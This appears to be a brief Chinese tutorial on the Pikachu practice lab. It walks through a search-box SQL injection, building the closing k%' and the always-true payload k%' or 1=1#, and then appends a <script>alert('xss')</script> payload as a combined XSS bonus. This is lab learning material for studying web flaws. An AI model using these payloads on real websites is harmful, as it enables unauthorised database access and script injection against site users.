pikachu之sql搜索型注入xss彩蛋

搜索型注入

• 输入字符k，搜索

返回了所有含有关键字k的用户。

尝试构建闭合

k%'

符号#为SQL语法注释，--同义，/**/为多行

k%'#

猜测后端传参格式就为{'%$insert%'}

查看后端源码

加入万能钥匙

k%' or 1=1#

xss彩蛋

将SQL部分闭合完整，写入script语句

k%' or 1=1# <script>alert('xss')</script>

两个漏洞同时利用